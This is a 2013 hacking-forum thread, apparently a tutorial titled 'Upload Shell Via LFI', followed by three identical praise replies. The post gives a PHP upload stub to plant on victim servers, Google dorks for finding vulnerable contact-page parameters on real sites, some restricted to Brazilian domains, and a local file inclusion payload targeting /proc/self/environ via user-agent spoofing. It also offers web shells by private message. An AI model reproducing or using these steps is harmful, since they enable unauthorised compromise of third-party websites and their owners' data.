![]() |
|
Upload Shell Via LFI :) - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: Upload Shell Via LFI :) (/Thread-Upload-Shell-Via-LFI) |
Upload Shell Via LFI :) - jonas6190 - 08-19-2013 What You Need: Google Chrome: Code: www.google.com/chrome/Chrome UA Spoofer: Code: https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmgLFI CODE: Code: <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>zero-security</p><br> <form action="" method="post" enctype="multipart/form-data">Filename: <input type="file" name="file" /><input type="submit" value="Submit" />Site To Find Website: Code: www.google.comDork: (If you want more dork's use your brain and make your own dork's) Code: allinurl:pg=contact.php
allinurl:page=contact.php
allinurl:home=contact.php
allinurl:?index.php?pagina=contato.php site:br
allinurl:?index.php?pagina=clientes.php site:br
allinurl:?index.php?pagina=produtos.php site:br
allinurl:?index.php?pagina=contato.phpExecute LFI Code: Code: %2Fproc%2Fself%2FenvironShell: Code: Private Message Me and I will Send Or just find it on google. But BeCareful most shell on google are backdoor-edThanks for watching in any part you guys don't understand feel free to PM me #xHaZeR. RE: Upload Shell Via LFI :) - RaccoonCity_mybb_import13707 - 10-03-2013 GREAT tutorial! Great explaining, the youtube video makes it so much easier! Just, great job. +1 rep for you bro! ![]() Keep this up! RE: Upload Shell Via LFI :) - RaccoonCity_mybb_import13707 - 10-03-2013 GREAT tutorial! Great explaining, the youtube video makes it so much easier! Just, great job. +1 rep for you bro! ![]() Keep this up! RE: Upload Shell Via LFI :) - RaccoonCity_mybb_import13707 - 10-03-2013 GREAT tutorial! Great explaining, the youtube video makes it so much easier! Just, great job. +1 rep for you bro! ![]() Keep this up! |